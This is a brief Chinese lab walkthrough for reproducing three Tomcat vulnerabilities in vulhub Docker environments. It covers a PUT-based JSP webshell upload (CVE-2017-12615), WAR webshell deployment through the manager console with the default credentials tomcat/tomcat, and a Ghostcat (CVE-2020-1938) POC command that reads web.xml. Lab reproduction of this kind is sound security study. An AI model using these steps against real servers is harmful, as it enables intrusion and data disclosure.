tomcat中间件漏洞CVE-2017-12615,后台弱口令部署war包,CVE-2020-1938
一.CVE-2017-12615
环境搭建
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d
漏洞复现
http://172.16.1.22
1.⾸⻚抓包,修改为 PUT ⽅式提交
PUT /shell.jsp/
2.上传成功进行访问,使用Webshell客户端⼯具进⾏连接
二.后台弱口令部署war包
环境搭建 8
cd vulhub-master/tomcat/tomcat8
docker-compose up -d
漏洞复现 http://172.16.1.22:8080/manager/html
默认密码:tomcat/tomcat
1.制作WAR包
制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。
2. ⽂件上传成功后,默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录,然后⽬录中得⽊⻢就是压缩 前的⽂件名。 http://172.16.1.22:8080/1/1.jsp
三.CVE-2020-1938
环境搭建
cd vulhub-master/tomcat/CVE-2020-1938
docker-compose up -d
POC: python 111.py -p 8009 -f /WEB-INF/web.xml 172.16.1.22
